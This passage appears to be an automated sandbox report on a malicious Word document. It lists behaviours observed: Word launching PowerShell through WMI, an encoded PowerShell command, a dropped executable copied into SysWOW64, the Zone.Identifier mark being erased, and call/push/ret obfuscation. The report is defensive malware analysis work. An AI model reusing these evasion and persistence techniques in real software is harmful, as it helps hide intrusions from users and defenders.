Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\BEAUREGARD\Videos\PwdChange_src\PwdChange\Release\PwdChange.pdb source: Ay8g9b.exe, 00000004.00000000.2095012302.0000000000427000.00000002.00020000.sdmp, KBDFA.exe, 00000005.00000000.2098862093.0000000000427000.00000002.00020000.sdmp, Ay8g9b.exe.2.dr

Data Obfuscation:

PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD 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
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00418CC0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 4_2_00418CC0
PE file contains an invalid checksum
Source: Ay8g9b.exe.2.dr Static PE information: real checksum: 0x5e854 should be: 0x65a24
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041005B push ecx; ret 4_2_0041006E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004100D5 push ecx; ret 4_2_004100E8
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5C40 push ecx; mov dword ptr [esp], 00004180h 4_2_003C5C41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CA0 push ecx; mov dword ptr [esp], 0000ECEBh 4_2_003C5CA1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CF0 push ecx; mov dword ptr [esp], 0000DEB7h 4_2_003C5CF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5D50 push ecx; mov dword ptr [esp], 000097F2h 4_2_003C5D51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5DB0 push ecx; mov dword ptr [esp], 0000F636h 4_2_003C5DB1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E10 push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_003C5E11
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E40 push ecx; mov dword ptr [esp], 00002B63h 4_2_003C5E41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E80 push ecx; mov dword ptr [esp], 00002BE4h 4_2_003C5E81
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5EF0 push ecx; mov dword ptr [esp], 000066B1h 4_2_003C5EF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F50 push ecx; mov dword ptr [esp], 00000282h 4_2_003C5F51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F90 push ecx; mov dword ptr [esp], 0000765Fh 4_2_003C5F91
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028783E push ecx; mov dword ptr [esp], 0000ECEBh 4_2_0028783F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028788E push ecx; mov dword ptr [esp], 0000DEB7h 4_2_0028788F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002878EE push ecx; mov dword ptr [esp], 000097F2h 4_2_002878EF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028794E push ecx; mov dword ptr [esp], 0000F636h 4_2_0028794F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002879AE push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_002879AF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002879DE push ecx; mov dword ptr [esp], 00002B63h 4_2_002879DF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287A1E push ecx; mov dword ptr [esp], 00002BE4h 4_2_00287A1F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287A8E push ecx; mov dword ptr [esp], 000066B1h 4_2_00287A8F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287AEE push ecx; mov dword ptr [esp], 00000282h 4_2_00287AEF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287B2E push ecx; mov dword ptr [esp], 0000765Fh 4_2_00287B2F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028DE1B push ecx; retf 4_2_0028DE30
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028D6DB push ecx; retf 4_2_0028D6F0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002877DE push ecx; mov dword ptr [esp], 00004180h 4_2_002877DF
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5E10 push ecx; mov dword ptr [esp], 0000AF8Ah 5_2_003E5E11
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5D50 push ecx; mov dword ptr [esp], 000097F2h 5_2_003E5D51
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5F50 push ecx; mov dword ptr [esp], 00000282h 5_2_003E5F51
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5E40 push ecx; mov dword ptr [esp], 00002B63h 5_2_003E5E41
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5C40 push ecx; mov dword ptr [esp], 00004180h 5_2_003E5C41

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Executable created and started: C:\Windows\SysWOW64\spopk\KBDFA.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe PE file moved: C:\Windows\SysWOW64\spopk\KBDFA.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File opened: C:\Windows\SysWOW64\spopk\KBDFA.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00402AE1 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_00402AE1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Off